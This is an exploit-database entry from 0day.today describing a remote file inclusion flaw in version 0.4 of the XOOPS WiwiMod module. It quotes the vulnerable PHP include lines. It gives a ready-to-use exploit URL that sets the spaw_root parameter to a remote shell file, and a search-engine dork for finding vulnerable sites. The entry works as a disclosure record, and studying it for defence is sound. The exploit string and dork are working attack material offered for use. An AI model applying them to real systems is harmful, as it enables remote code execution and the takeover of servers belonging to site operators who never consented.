[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XOOPS Module WiwiMod 0.4 Remote File Inclusion Vulnerability

Author
GoLd_M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1959
Category
web applications
Date add
19-06-2007
Platform
unsorted
============================================================
XOOPS Module WiwiMod 0.4 Remote File Inclusion Vulnerability
============================================================



# XOOPS Module WiwiMod v0.4 (spaw_root) RFI Vulnerability

# D.Script:
      
http://codigolivre.org.br/frs/download.php/1745/xoops2-mod_wiwimod_0.4_xavier_jimenez.zip

# V.Code :
      include $spaw_root.'config/spaw_control.config.php';
      include $spaw_root.'class/toolbars.class.php';
      include $spaw_root.'class/lang.class.php';

# In :
      /spaw/spaw_control.class.php

# Exploits:
      /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=Shell.txt?

#D0Rk:
      allinurl:/modules/wiwimod/


# Discovered by:
      GoLd_M = [Mahmood_ali]



#  0day.today [2024-12-25]  #